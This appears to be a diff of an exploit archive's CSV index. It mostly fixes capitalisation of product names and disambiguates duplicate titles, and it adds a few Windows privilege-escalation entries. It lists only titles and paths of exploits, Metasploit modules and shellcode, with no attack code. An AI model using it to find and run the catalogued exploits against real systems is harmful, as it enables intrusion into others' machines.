10106,platforms/windows/dos/10106.c,"Avast! 4.8.1351.0 AntiVirus - aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0
40083,platforms/php/webapps/40083.txt,"WordPress Plugin Activity Log 2.3.1 - Persistent Cross-Site Scripting",2016-07-11,"Han Sahin",php,webapps,80
10160,platforms/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote Denial of Service",2009-11-17,"Marc Doudiet",windows,dos,21
10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass / Arbitrary File Upload",2009-11-17,blackenedsecurity,asp,webapps,0
@ -9495,7 +9495,7 @@ id,file,description,date,author,platform,type,port
10177,platforms/php/webapps/10177.txt,"Joomla! Extension iF Portfolio Nexus - SQL Injection",2009-11-18,"599eme Man",php,webapps,0
10178,platforms/php/webapps/10178.txt,"Joomla! / Mambo Component com_ezine 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0
10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Multiple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0
10181,platforms/php/webapps/10181.txt,"bitrix site manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0
10181,platforms/php/webapps/10181.txt,"Bitrix Site Manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0
10182,platforms/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,hardware,dos,0
10183,platforms/php/webapps/10183.php,"Joomla! 1.5.12 RCE via TinyMCE - Arbitrary File Upload",2009-11-19,daath,php,webapps,80
10184,platforms/linux/dos/10184.txt,"KDE KDELibs 4.3.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",linux,dos,0
@ -10323,7 +10323,7 @@ id,file,description,date,author,platform,type,port
11245,platforms/windows/dos/11245.txt,"Mozilla Firefox 3.6 - (XML parser) Memory Corruption PoC/Denial of Service",2010-01-24,d3b4g,windows,dos,0
11247,platforms/windows/dos/11247.txt,"Opera 10.10 - (XML parser) Denial of Service (PoC)",2010-01-24,d3b4g,windows,dos,0
11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0
11249,platforms/php/webapps/11249.txt,"boastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,php,webapps,0
11249,platforms/php/webapps/11249.txt,"BoastMachine 3.1 - Arbitrary File Upload",2010-01-24,alnjm33,php,webapps,0
11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service",2010-01-24,"Zer0 Thunder",windows,dos,0
11255,platforms/windows/local/11255.pl,"Winamp 5.572 - whatsnew.txt Stack Overflow Exploit",2010-01-25,Dz_attacker,windows,local,0
11256,platforms/windows/local/11256.pl,"Winamp 5.572 - whatsnew.txt Local Buffer Overflow (Windows XP SP3 DE)",2010-01-25,NeoCortex,windows,local,0
@ -11141,7 +11141,7 @@ id,file,description,date,author,platform,type,port
12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
12190,platforms/php/webapps/12190.txt,"Joomla! Component Jvehicles - (aid) SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0
12191,platforms/php/webapps/12191.txt,"Joomla! Component com_jp_jobs 1.2.0 - 'id' SQL Injection",2010-04-13,v3n0m,php,webapps,0
12192,platforms/php/webapps/12192.txt,"blog system 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0
12192,platforms/php/webapps/12192.txt,"Blog System 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0
12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,"cr4wl3r ",php,webapps,0
12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,"cr4wl3r ",php,webapps,0
12195,platforms/php/webapps/12195.rb,"joelz bulletin board 0.9.9rc3 - Multiple SQL Injections",2010-04-13,"Easy Laster",php,webapps,0
@ -11375,7 +11375,7 @@ id,file,description,date,author,platform,type,port
12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - (Windows x86) CSS Remote Denial of Service",2010-04-29,ITSecTeam,windows,dos,0
12458,platforms/php/webapps/12458.txt,"Scratcher - (SQL Injection / Cross-Site Scripting) Multiple Remote",2010-04-29,"cr4wl3r ",php,webapps,0
12459,platforms/php/webapps/12459.txt,"ec21 clone 3.0 - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0
12460,platforms/php/webapps/12460.txt,"b2b gold script - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0
12460,platforms/php/webapps/12460.txt,"B2B Gold Script - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0
12461,platforms/php/webapps/12461.txt,"JobPost - SQL Injection",2010-04-30,Sid3^effects,php,webapps,0
12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQL Injection",2010-04-30,Sid3^effects,php,webapps,0
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
@ -11589,7 +11589,7 @@ id,file,description,date,author,platform,type,port
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
12692,platforms/php/webapps/12692.txt,"TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,php,webapps,0
12692,platforms/php/webapps/12692.txt,"Wordpress Plugin TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,php,webapps,0
12693,platforms/asp/webapps/12693.txt,"Asset Manager - Arbitrary File Upload",2010-05-22,Ra3cH,asp,webapps,0
12694,platforms/php/webapps/12694.txt,"Tochin eCommerce - Multiple Remote Exploits",2010-05-22,cyberlog,php,webapps,0
12695,platforms/php/webapps/12695.txt,"Azimut Technologie - Admin Login Bypass",2010-05-22,Ra3cH,php,webapps,0
@ -11680,7 +11680,7 @@ id,file,description,date,author,platform,type,port
12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,php,webapps,0
12801,platforms/php/webapps/12801.txt,"osCommerce Online Merchant 2.2 - File Disclosure / Authentication Bypass",2010-05-30,Flyff666,php,webapps,0
12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0
12804,platforms/multiple/remote/12804.txt,"Nginx http server 0.6.36 - Directory Traversal",2010-05-30,"cp77fk4r ",multiple,remote,0
12804,platforms/multiple/remote/12804.txt,"Nginx 0.6.36 - Directory Traversal",2010-05-30,"cp77fk4r ",multiple,remote,0
12805,platforms/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0
12806,platforms/php/webapps/12806.txt,"CMScout - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0
12807,platforms/php/webapps/12807.txt,"Creato Script - SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0
@ -12959,7 +12959,7 @@ id,file,description,date,author,platform,type,port
14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - bindshell on port 2525 Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0
14806,platforms/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection",2010-08-26,"Lord Tittis3000",php,webapps,0
14799,platforms/php/webapps/14799.txt,"osCommerce Online Merchant - Remote File Inclusion",2010-08-26,LoSt.HaCkEr,php,webapps,0
14801,platforms/php/webapps/14801.txt,"atomic photo album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0
14801,platforms/php/webapps/14801.txt,"Atomic Photo Album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0
14802,platforms/php/webapps/14802.html,"Hycus CMS 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-26,10n1z3d,php,webapps,0
14811,platforms/php/webapps/14811.txt,"Joomla! Component com_remository - Arbitrary File Upload",2010-08-26,J3yk0ob,php,webapps,0
14808,platforms/php/webapps/14808.pl,"Mini-CMS / News Script Light 1.0 - Remote File Inclusion",2010-08-26,bd0rk,php,webapps,0
@ -13140,7 +13140,7 @@ id,file,description,date,author,platform,type,port
15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) - Heap Overflow (.mp3 / .wav / .ogg / .wma) (PoC)",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0
15070,platforms/php/webapps/15070.txt,"ibPhotohost 1.1.2 - SQL Injection",2010-09-21,fred777,php,webapps,0
15071,platforms/windows/remote/15071.txt,"Softek Barcode Reader Toolkit ActiveX 7.1.4.14 - (SoftekATL.dll) Buffer Overflow (PoC)",2010-09-21,LiquidWorm,windows,remote,0
15072,platforms/windows/remote/15072.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)",2010-09-21,Trancer,windows,remote,0
15072,platforms/windows/remote/15072.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (1)",2010-09-21,Trancer,windows,remote,0
15073,platforms/windows/remote/15073.rb,"Novell iPrint Client - ActiveX Control 'debug' Buffer Overflow (Metasploit)",2010-09-21,Trancer,windows,remote,0
15074,platforms/linux/local/15074.sh,"mountall 2.15.2 (Ubuntu 10.04/10.10) - Privilege Escalation",2010-09-21,fuzz,linux,local,0
15075,platforms/php/webapps/15075.txt,"wpQuiz 2.7 - Authentication Bypass",2010-09-21,KnocKout,php,webapps,0
@ -13338,7 +13338,7 @@ id,file,description,date,author,platform,type,port
15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15318,platforms/linux/remote/15318.txt,"NitroSecurity ESM 8.4.0a - Remote Code Execution",2010-10-26,"Filip Palian",linux,remote,0
15319,platforms/windows/dos/15319.pl,"Apache 2.2 - (Windows) Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0
15320,platforms/php/webapps/15320.py,"Bigace_2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)",2010-10-26,Sweet,php,webapps,0
15320,platforms/php/webapps/15320.py,"BigACE 2.7.3 - Cross-Site Request Forgery (Change Admin Password) (PoC)",2010-10-26,Sweet,php,webapps,0
15321,platforms/php/webapps/15321.txt,"DBHcms 1.1.4 (dbhcms_user and SearchString) - SQL Injection",2010-10-27,"High-Tech Bridge SA",php,webapps,0
15322,platforms/php/webapps/15322.txt,"phpLiterAdmin 1.0 RC1 - Authentication Bypass",2010-10-27,"High-Tech Bridge SA",php,webapps,0
15323,platforms/php/webapps/15323.txt,"DZCP (deV!L_z Clanportal) 1.5.4 - Local File Inclusion",2010-10-27,"High-Tech Bridge SA",php,webapps,0
@ -14044,7 +14044,7 @@ id,file,description,date,author,platform,type,port
16218,platforms/php/webapps/16218.txt,"WordPress Plugin Z-Vote 1.1 - SQL Injection",2011-02-23,"High-Tech Bridge SA",php,webapps,0
16213,platforms/php/webapps/16213.txt,"Hyena Cart - 'index.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
16214,platforms/php/webapps/16214.txt,"tplSoccerStats - 'player.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
16217,platforms/php/webapps/16217.txt,"bitweaver 2.8.1 - Persistent Cross-Site Scripting",2011-02-23,lemlajt,php,webapps,0
16217,platforms/php/webapps/16217.txt,"Bitweaver 2.8.1 - Persistent Cross-Site Scripting",2011-02-23,lemlajt,php,webapps,0
16227,platforms/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",hardware,remote,0
16228,platforms/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
@ -14081,7 +14081,7 @@ id,file,description,date,author,platform,type,port
16263,platforms/linux/dos/16263.c,"Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,linux,dos,0
16265,platforms/php/webapps/16265.txt,"Readmore Systems Script - SQL Injection",2011-03-02,"vBzone and Zooka and El3arby",php,webapps,0
16266,platforms/php/webapps/16266.txt,"Quicktech - SQL Injection",2011-03-02,eXeSoul,php,webapps,0
16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0
16267,platforms/php/webapps/16267.txt,"Bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0
16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection",2011-03-02,DSecurity,php,webapps,0
16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt_ H@ckk3y",ios,remote,0
@ -14097,7 +14097,7 @@ id,file,description,date,author,platform,type,port
16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve (Metasploit)",2010-08-07,Metasploit,unix,dos,0
16285,platforms/linux/remote/16285.rb,"NTP daemon readvar - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,linux,remote,0
16286,platforms/multiple/remote/16286.rb,"RealServer - Describe Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0
16287,platforms/multiple/remote/16287.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2010-11-11,Metasploit,multiple,remote,0
16287,platforms/multiple/remote/16287.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit) (2)",2010-11-11,Metasploit,multiple,remote,0
16289,platforms/linux/remote/16289.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Metasploit)",2010-02-11,Metasploit,linux,remote,0
16290,platforms/multiple/remote/16290.rb,"Veritas NetBackup - Remote Command Execution (Metasploit) (2)",2010-10-09,Metasploit,multiple,remote,0
16291,platforms/multiple/remote/16291.rb,"HP OpenView OmniBack II - Command Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote,0
@ -14195,7 +14195,7 @@ id,file,description,date,author,platform,type,port
16383,platforms/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0
16384,platforms/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0
16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0
16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (2) (Metasploit)",2010-07-03,Metasploit,hardware,remote,0
16388,platforms/hardware/remote/16388.rb,"NetGear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote,0
16389,platforms/windows/remote/16389.rb,"Omni-NFS Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
@ -14310,7 +14310,7 @@ id,file,description,date,author,platform,type,port
16498,platforms/windows/remote/16498.rb,"EnjoySAP SAP GUI - ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
16499,platforms/windows/remote/16499.rb,"Microsoft Internet Explorer - Unsafe Scripting Misconfiguration (Metasploit)",2010-09-20,Metasploit,windows,remote,0
16500,platforms/windows/remote/16500.rb,"Hyleos ChemView - ActiveX Control Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote,0
16501,platforms/windows/remote/16501.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit)",2010-09-21,Metasploit,windows,remote,0
16501,platforms/windows/remote/16501.rb,"Novell iPrint Client - ActiveX Control call-back-url Buffer Overflow (Metasploit) (2)",2010-09-21,Metasploit,windows,remote,0
16502,platforms/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module - Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use-After-Free (1)",2010-04-30,Metasploit,windows,local,0
16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (1)",2010-05-03,Metasploit,windows,local,0
@ -14373,7 +14373,7 @@ id,file,description,date,author,platform,type,port
16561,platforms/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
16562,platforms/windows/local/16562.rb,"Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0
16563,platforms/windows/remote/16563.rb,"Tumbleweed FileTransfer - vcst_eu.dll ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0
16565,platforms/windows/remote/16565.rb,"RKD Software BarCodeAx.dll 4.9 - ActiveX Remote Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16566,platforms/windows/remote/16566.rb,"CommuniCrypt Mail 1.16 - SMTP ActiveX Stack Buffer Overflow (Metasploit)",2010-07-26,Metasploit,windows,remote,0
16567,platforms/windows/remote/16567.rb,"Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (Metasploit)",2010-04-30,Metasploit,windows,remote,0
@ -14725,7 +14725,7 @@ id,file,description,date,author,platform,type,port
16916,platforms/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution (Metasploit)",2011-03-03,Metasploit,linux,remote,0
16917,platforms/php/webapps/16917.rb,"Dogfood CRM - spell.php Remote Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0
16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent - net.tcp.listen Command Injection (Metasploit)",2010-07-03,Metasploit,freebsd,remote,0
16919,platforms/linux/remote/16919.rb,"DistCC Daemon - Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
16919,platforms/linux/remote/16919.rb,"DistCC Daemon - Command Execution (Metasploit) (2)",2010-07-03,Metasploit,linux,remote,0
16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,linux,remote,0
16921,platforms/linux/remote/16921.rb,"ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)",2010-12-03,Metasploit,linux,remote,0
16922,platforms/linux/remote/16922.rb,"UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)",2010-12-05,Metasploit,linux,remote,0
@ -14868,7 +14868,7 @@ id,file,description,date,author,platform,type,port
17077,platforms/php/webapps/17077.txt,"Pligg CMS 1.1.3 - Multiple Vulnerabilities",2011-03-30,"Jelmer de Hen",php,webapps,0
17078,platforms/multiple/remote/17078.java,"Zend Java Bridge - Remote Code Execution (ZDI-11-113)",2011-03-30,ikki,multiple,remote,0
17079,platforms/php/webapps/17079.txt,"IrIran Shoping Script - SQL Injection",2011-03-30,Net.Edit0r,php,webapps,0
17080,platforms/php/webapps/17080.txt,"Bigace 2.7.5 - Arbitrary File Upload",2011-03-30,Net.Edit0r,php,webapps,0
17080,platforms/php/webapps/17080.txt,"BigACE 2.7.5 - Arbitrary File Upload",2011-03-30,Net.Edit0r,php,webapps,0
17081,platforms/asp/webapps/17081.txt,"CosmoQuest - Login Bypass",2011-03-30,Net.Edit0r,asp,webapps,0
17083,platforms/linux/local/17083.pl,"HT Editor 2.0.18 - File Opening Stack Overflow",2011-03-30,ZadYree,linux,local,0
17145,platforms/windows/dos/17145.pl,"Vallen Zipper 2.30 - '.zip' Heap Overflow",2011-04-11,"C4SS!0 G0M3S",windows,dos,0
@ -15321,7 +15321,7 @@ id,file,description,date,author,platform,type,port
17628,platforms/php/webapps/17628.txt,"WordPress Plugin Media Library Categories 1.0.6 - SQL Injection",2011-08-06,"Miroslav Stampar",php,webapps,0
17629,platforms/php/webapps/17629.txt,"acontent 1.1 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0
17630,platforms/php/webapps/17630.txt,"AChecker 1.2 - Multiple Error-Based SQL Injection Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0
17631,platforms/php/webapps/17631.txt,"atutor 2.0.2 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0
17631,platforms/php/webapps/17631.txt,"ATutor 2.0.2 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0
17633,platforms/php/webapps/17633.txt,"Cart Software - Multiple Vulnerabilities",2011-08-06,hosinn,php,webapps,0
17634,platforms/windows/local/17634.pl,"Free CD to MP3 Converter 3.1 - Universal DEP Bypass",2011-08-07,"C4SS!0 G0M3S",windows,local,0
17635,platforms/hardware/remote/17635.rb,"HP JetDirect PJL - Interface Universal Directory Traversal (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0
@ -16175,7 +16175,7 @@ id,file,description,date,author,platform,type,port
18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution (Metasploit)",2012-03-24,Metasploit,php,webapps,0
18660,platforms/php/webapps/18660.txt,"RIPS 0.53 - Multiple Local File Inclusion",2012-03-24,localh0t,php,webapps,0
18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 - file handling memory Corruption",2012-03-24,"Senator of Pirates",windows,dos,0
18676,platforms/php/webapps/18676.txt,"boastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,php,webapps,0
18676,platforms/php/webapps/18676.txt,"BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,php,webapps,0
18670,platforms/php/webapps/18670.txt,"PicoPublisher 2.0 - SQL Injection",2012-03-28,ZeTH,php,webapps,0
18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - (vncviewer.exe) Buffer Overflow (Metasploit)",2012-03-26,Metasploit,windows,remote,0
18665,platforms/multiple/dos/18665.py,"PHP 5.4.0 Built-in Web Server - Denial of Service (PoC)",2012-03-25,ls,multiple,dos,0
@ -17027,6 +17027,7 @@ id,file,description,date,author,platform,type,port
19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon setgid dialer",1999-12-01,"Brock Tellier",freebsd,local,0
19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 xmindpath - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 angband - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
40430,platforms/windows/local/40430.cs,"Microsoft Windows - RegLoadAppKey Hive Enumeration Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
19654,platforms/sco/local/19654.pl,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin'",1998-12-02,"Brock Tellier",sco,local,0
19655,platforms/linux/local/19655.txt,"RSA Security RSAREF 2.0 - Buffer Overflow",1999-12-14,"Alberto Solino",linux,local,0
19656,platforms/sco/local/19656.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'xauto' Buffer Overflow",1999-12-03,"Brock Tellier",sco,local,0
@ -17363,7 +17364,7 @@ id,file,description,date,author,platform,type,port
20006,platforms/windows/dos/20006.nasl,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (2)",2000-06-08,"Renaud Deraison",windows,dos,0
20007,platforms/cgi/remote/20007.c,"3R Soft MailStudio 2000 2.0 - userreg.cgi Arbitrary Command Execution",2000-04-24,fygrave,cgi,remote,0
20008,platforms/cgi/remote/20008.txt,"3R Soft MailStudio 2000 2.0 - Arbitrary File Access",2000-06-09,s0ftpr0ject,cgi,remote,0
20009,platforms/linux/remote/20009.py,"atmail email server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution",2012-07-21,muts,linux,remote,0
20009,platforms/linux/remote/20009.py,"AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution",2012-07-21,muts,linux,remote,0
20011,platforms/windows/webapps/20011.js,"SolarWinds orion network performance monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0
20012,platforms/windows/local/20012.txt,"Computer Associates eTrust Intrusion Detection 1.4.1.13 - Weak Encryption",2000-06-07,Phate.net,windows,local,0
20013,platforms/linux/local/20013.c,"Sam Lantinga splitvt 1.6.3 - Buffer Overflow",2000-06-01,Syzop,linux,local,0
@ -17641,6 +17642,7 @@ id,file,description,date,author,platform,type,port
20303,platforms/cgi/remote/20303.pl,"Oatmeal Studios Mail File 1.10 - Arbitrary File Disclosure",2000-10-11,"Dirk Brockhausen",cgi,remote,0
20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - visiadmin.exe Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0
20305,platforms/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - Arbitrary File Upload",1999-01-30,Mnemonix,windows,remote,0
40428,platforms/windows/local/40428.txt,"Macro Expert 4.0 - Multiple Privilege Escalations",2016-09-26,Tulpa,windows,local,0
20306,platforms/windows/remote/20306.html,"Microsoft Virtual Machine - Arbitrary Java Codebase Execution",2000-10-18,"Georgi Guninski",windows,remote,0
20307,platforms/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 - Telnet Buffer Overflow",2000-10-18,"Ussr Labs",windows,dos,0
20308,platforms/linux/remote/20308.c,"Samba 1.9.19 - Long Password Buffer Overflow",1997-09-25,root@adm.kix-azz.org,linux,remote,0
@ -17683,7 +17685,7 @@ id,file,description,date,author,platform,type,port
20345,platforms/php/webapps/20345.txt,"iauto mobile Application 2012 - Multiple Vulnerabilities",2012-08-08,Vulnerability-Lab,php,webapps,0
20346,platforms/php/webapps/20346.txt,"Inout Mobile Webmail APP - Persistent Cross-Site Scripting",2012-08-08,Vulnerability-Lab,php,webapps,0
20347,platforms/php/webapps/20347.txt,"Openconstructor CMS 3.12.0 - 'id' Parameter Multiple SQL Injection",2012-08-08,"Lorenzo Cantoni",php,webapps,0
20348,platforms/windows/webapps/20348.py,"axigen mail server 8.0.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
20348,platforms/windows/webapps/20348.py,"Axigen Mail Server 8.0.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
20349,platforms/windows/webapps/20349.py,"emailarchitect enterprise email server 10.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
20350,platforms/windows/webapps/20350.py,"escon supportportal pro 3.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
20351,platforms/windows/webapps/20351.py,"mailenable enterprise 6.5 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0
@ -17732,6 +17734,7 @@ id,file,description,date,author,platform,type,port
20395,platforms/unix/remote/20395.c,"BNC 2.2.4/2.4.6/2.4.8 - IRC Proxy Buffer Overflow (2)",1998-12-26,"jamez and dumped",unix,remote,0
20396,platforms/hp-ux/local/20396.sh,"HP-UX 10.x/11.x - Aserver PATH",1998-10-18,Loneguard,hp-ux,local,0
20397,platforms/cgi/remote/20397.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - Full Path Disclosure",2000-11-10,sozni,cgi,remote,0
40427,platforms/windows/local/40427.txt,"Iperius Remote 1.7.0 - Unquoted Service Path Privilege Escalation",2016-09-26,Tulpa,windows,local,0
20398,platforms/php/webapps/20398.txt,"MobileCartly 1.0 - Arbitrary File Deletion",2012-08-10,GoLd_M,php,webapps,0
20399,platforms/windows/remote/20399.html,"Microsoft Indexing Services (Windows 2000) - File Verification",2000-11-10,"Georgi Guninski",windows,remote,0
